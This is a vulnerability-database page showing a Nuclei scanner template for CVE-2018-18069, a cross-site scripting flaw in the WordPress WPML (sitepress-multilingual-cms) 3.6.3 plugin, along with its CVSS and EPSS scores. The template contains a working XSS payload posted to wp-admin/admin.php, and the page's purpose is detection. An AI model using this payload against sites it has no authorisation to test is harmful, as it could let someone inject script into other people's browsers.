Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-18069
HistoryMay 14, 2020 - 5:54 p.m.

WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting

2020-05-1417:54:02
ProjectDiscovery
github.com
5

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

40.5%

WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.

id: CVE-2018-18069

info:
  name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting
  author: nadino
  severity: medium
  description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update WordPress sitepress-multilingual-cms to the latest version to mitigate the XSS vulnerability.
  reference:
    - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-18069
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-18069
    cwe-id: CWE-79
    epss-score: 0.00092
    epss-percentile: 0.38026
    cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: wpml
    product: wpml
    framework: wordpress
  tags: cve2018,cve,wordpress,xss,plugin,wpml

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin.php"

    body: |
      icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>
    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(header), "text/html")'
          - 'contains(set_cookie, "_icl_current_admin_language")'
          - 'contains(body, "\"><script>alert(0);</script>")'
        condition: and
# digest: 4b0a00483046022100cbde343fd3e17d2ea27e336ffb9188c1b206ffddbca64133f60a51899fec8161022100f831ce4023cacc6cdc0e47b7d783b39f80685ce3a9dd5b1f475af144b8163794:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

40.5%

Related for NUCLEI:CVE-2018-18069